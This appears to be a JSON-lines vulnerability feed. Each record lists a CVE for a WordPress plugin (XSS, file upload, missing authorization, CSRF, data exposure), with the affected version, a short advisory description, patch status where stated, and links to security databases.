{"CVE_ID":"CVE-2024-6661","slug":"paritypress","versionImpact":"1.0.0","description":"The ParityPress \u2013 Parity Pricing with Discount Rules plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'Discount Text' in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f015ff9b-a7dc-47de-83d4-d6b91ec433f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f015ff9b-a7dc-47de-83d4-d6b91ec433f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/paritypress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/paritypress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paritypress\\\/trunk\\\/app\\\/Hooks\\\/Activator.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paritypress\\\/trunk\\\/app\\\/Hooks\\\/Activator.php#L22\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43257","slug":"leopard-wordpress-offload-media","versionImpact":"2.0.36","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Nouthemes Leopard - WordPress offload media. This issue affects Leopard - WordPress offload media: from n\/a through 2.0.36.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/leopard-wordpress-offload-media\\\/wordpress-leopard-wordpress-offload-media-plugin-2-0-36-subscriber-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/leopard-wordpress-offload-media\\\/wordpress-leopard-wordpress-offload-media-plugin-2-0-36-subscriber-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12437","slug":"marketplace-items","versionImpact":"1.5.5","description":"The Marketplace Items plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'envato' shortcode in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/marketplace-items\\\/trunk\\\/marketplace-items.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/marketplace-items\\\/trunk\\\/marketplace-items.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/marketplace-items\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/marketplace-items\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e055c319-1aeb-4a97-98d1-3b38e61f30f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e055c319-1aeb-4a97-98d1-3b38e61f30f0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2077","slug":"simple-amazon-affiliate","versionImpact":"1.0.9","description":"The Simple Amazon Affiliate plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'msg' parameter in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-amazon-affiliate\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-amazon-affiliate\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecd48e2c-343f-4bae-9d9e-260d003ef87c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecd48e2c-343f-4bae-9d9e-260d003ef87c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31846","slug":"theatre","versionImpact":"0.18.7","description":"Missing Authorization vulnerability in Jeroen Schmit Theater for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Theater for WordPress: from n\/a through 0.18.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/theatre\\\/vulnerability\\\/wordpress-theater-for-wordpress-plugin-0-18-7-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/theatre\\\/vulnerability\\\/wordpress-theater-for-wordpress-plugin-0-18-7-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12732","slug":"affiliateimportereb","versionImpact":"1.0.6","description":"The AffiliateImporterEb WordPress plugin through 1.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bc46edd8-8d77-4567-873b-e9e90a01adcf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bc46edd8-8d77-4567-873b-e9e90a01adcf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6057","slug":"wpbookit","versionImpact":"1.0.4","description":"The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the handle_image_upload() function in all versions up to, and including, 1.0.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-profile-controller.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-profile-controller.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3326098%40wpbookit&new=3326098%40wpbookit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3326098%40wpbookit&new=3326098%40wpbookit&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpbookit\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpbookit\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fac81cc0-c6c9-4009-aacb-52adc70c0261?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fac81cc0-c6c9-4009-aacb-52adc70c0261?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2169","slug":"simple-tags","versionImpact":"3.6.4","description":"The TaxoPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Related Posts functionality in versions up to, and including, 3.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Editor+ permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2868795%40simple-tags%2Ftrunk&old=2774153%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2868795%40simple-tags%2Ftrunk&old=2774153%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-tags\\\/trunk\\\/inc\\\/related-posts-functions.php?rev=2674563#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-tags\\\/trunk\\\/inc\\\/related-posts-functions.php?rev=2674563#L156\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52574d99-1ffe-4152-bf13-9cdd11d7300a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52574d99-1ffe-4152-bf13-9cdd11d7300a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4357","slug":"ulisting","versionImpact":"1.6.6","description":"The uListing plugin for WordPress is vulnerable to authorization bypass due to missing capability checks, and a missing security nonce, on the UlistingUserRole::save_role_api function in versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to arbitrarily delete site posts and pages.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71aa14b8-39bc-4b91-a7cf-9d203fdf44ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71aa14b8-39bc-4b91-a7cf-9d203fdf44ea?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ulisting\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ulisting\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4395","slug":"woo-abandoned-cart-recovery","versionImpact":"1.0.4","description":"The Abandoned Cart Recovery for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.4. This is due to missing or incorrect nonce validation on the get_items() and extra_tablenav() functions. This makes it possible for unauthenticated attackers to perform read-only actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45b627f9-e7c6-4bf6-b1c7-d607f3e083f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45b627f9-e7c6-4bf6-b1c7-d607f3e083f8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2550169%40woo-abandoned-cart-recovery&new=2550169%40woo-abandoned-cart-recovery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2550169%40woo-abandoned-cart-recovery&new=2550169%40woo-abandoned-cart-recovery&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1986","slug":"woocommerce-jetpack","versionImpact":"7.1.7","description":"The Booster Elite for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the wc_add_new_product() function in all versions up to, and including, 7.1.7. This makes it possible for customer-level attackers, and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. This is only exploitable when the user product upload functionality is enabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9c2fb7f-a05b-4852-97eb-7befe880d703?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9c2fb7f-a05b-4852-97eb-7befe880d703?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-add-form-shortcodes.php#L322\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-add-form-shortcodes.php#L322\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-add-form-shortcodes.php#L333\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-add-form-shortcodes.php#L333\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-add-form-shortcodes.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-add-form-shortcodes.php#L132\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-add-form-shortcodes.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/shortcodes\\\/class-wcj-products-add-form-shortcodes.php#L138\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/booster.io\\\/\",\"name\":\"https:\\\/\\\/booster.io\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-jetpack\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-jetpack\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6634","slug":"mastercurrency-wp","versionImpact":"1.1.61","description":"The Master Currency WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's currencyconverterform shortcode in all versions up to, and including, 1.1.61 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fea71287-f92e-43e5-adbf-d89fce437e56?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fea71287-f92e-43e5-adbf-d89fce437e56?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mastercurrency-wp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mastercurrency-wp\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7617","slug":"contact-form-to-any-api","versionImpact":"1.2.2","description":"The Contact Form to Any API plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Contact Form 7 form fields in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39487908-5cc5-42ac-8af4-65626694b1e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39487908-5cc5-42ac-8af4-65626694b1e4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-to-any-api\\\/trunk\\\/admin\\\/partials\\\/cf7-to-any-api-admin-entries.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-to-any-api\\\/trunk\\\/admin\\\/partials\\\/cf7-to-any-api-admin-entries.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10223","slug":"ht-team-member","versionImpact":"1.1.4","description":"The WP Team \u2013 WordPress Team Member Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's htteamember shortcode in all versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f5a8f5b-d67c-4c08-9f2d-1f743ffdae81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f5a8f5b-d67c-4c08-9f2d-1f743ffdae81?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ht-team-member\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ht-team-member\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177675\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177675\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2076","slug":"binlayerpress","versionImpact":"1.1","description":"The binlayerpress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/binlayerpress\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/binlayerpress\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af920a9-15fb-44c9-be31-7c9ed5bc2031?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af920a9-15fb-44c9-be31-7c9ed5bc2031?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31843","slug":"openai-tools-for-wp-wc","versionImpact":"2.1.5","description":"Missing Authorization vulnerability in Wilson OpenAI Tools for WordPress & WooCommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects OpenAI Tools for WordPress & WooCommerce: from n\/a through 2.1.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/openai-tools-for-wp-wc\\\/vulnerability\\\/wordpress-openai-tools-for-wordpress-woocommerce-plugin-2-1-5-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/openai-tools-for-wp-wc\\\/vulnerability\\\/wordpress-openai-tools-for-wordpress-woocommerce-plugin-2-1-5-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12726","slug":"clipart","versionImpact":"0.2","description":"The ClipArt WordPress plugin through 0.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88d748fc-6c2f-4656-99c5-c00cbed9d7e0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88d748fc-6c2f-4656-99c5-c00cbed9d7e0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2168","slug":"simple-tags","versionImpact":"3.6.4","description":"The TaxoPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Suggest Terms Title field in versions up to, and including, 3.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Editor+ permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2868795%40simple-tags%2Ftrunk&old=2774153%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2868795%40simple-tags%2Ftrunk&old=2774153%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-tags\\\/trunk\\\/inc\\\/suggestterms-functions.php?rev=2743620#L151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-tags\\\/trunk\\\/inc\\\/suggestterms-functions.php?rev=2743620#L151\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c051bfd-2754-4faf-8062-91752555166c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c051bfd-2754-4faf-8062-91752555166c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34172","slug":"wordpress-social-login","versionImpact":"3.0.4","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Miled WordPress Social Login plugin <=\u00a03.0.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-social-login\\\/wordpress-wordpress-social-login-plugin-3-0-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-social-login\\\/wordpress-wordpress-social-login-plugin-3-0-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-34573","slug":"pootle-page-builder","versionImpact":"5.7.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pootlepress Pootle Pagebuilder \u2013 WordPress Page builder allows Stored XSS. This issue affects Pootle Pagebuilder \u2013 WordPress Page builder: from n\/a through 5.7.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/pootle-page-builder\\\/wordpress-pootle-pagebuilder-plugin-5-7-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/pootle-page-builder\\\/wordpress-pootle-pagebuilder-plugin-5-7-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6591","slug":"ultimate-auction","versionImpact":"4.2.6","description":"The Ultimate WordPress Auction Plugin plugin for WordPress is vulnerable to unauthorized email creation and sending due to a missing capability check on the 'send_auction_email_callback' and 'resend_auction_email_callback' functions in all versions up to, and including, 4.2.6. This makes it possible for unauthenticated attackers to craft emails that include links and send to any email address.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/534a5d1d-cc34-4d84-b3a3-bf2282718656?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/534a5d1d-cc34-4d84-b3a3-bf2282718656?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php#L119\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php#L119\",\"refsource\":\"\",\"tags\":[]}]"}
